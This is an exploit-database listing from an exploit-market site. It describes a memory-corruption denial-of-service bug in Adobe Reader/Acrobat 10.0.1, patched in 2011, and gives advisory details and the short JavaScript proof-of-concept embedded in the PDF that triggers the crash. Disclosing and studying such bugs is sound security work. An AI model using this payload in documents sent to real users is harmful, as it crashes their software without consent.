[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Adobe Reader/Acrobat 10.0.1 DoS Exploit

Author
Soroush Dalili
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16349
Category
dos / poc
Date add
16-06-2011
Platform
windows
Title: [Adobe Reader/Acrobat Memory Corruption Denial of Service]
Report to Vendor: 24 Feb 2011
Application Name: [Adobe Reader/Acrobat]
Version: [10.0.1, other versions can be vulnerable before applying the 14 June 2011 Patch]
Reference(s): [
- http://secunia.com/advisories/43269/
]
Finder(s): [
- Soroush Dalili (Irsdl [at] yahoo [dot] com) - www.SecProject.com
]
PoC: Tested on Windows 7 SP1 and Windows XP SP3
 
PoC Details:
The following JS was the problem point inside the PDF file (Open the PoC file by a text editor):
/*****************************************************************************/
        var temp;
        for(var i=0;i<=8;i++)
        {
            temp+=temp+temp+"A";
        }
        var result = temp;
        try{
            viewState= result;
        }catch(e){}
        dirty; // Important!
/*****************************************************************************/



#  0day.today [2024-11-16]  #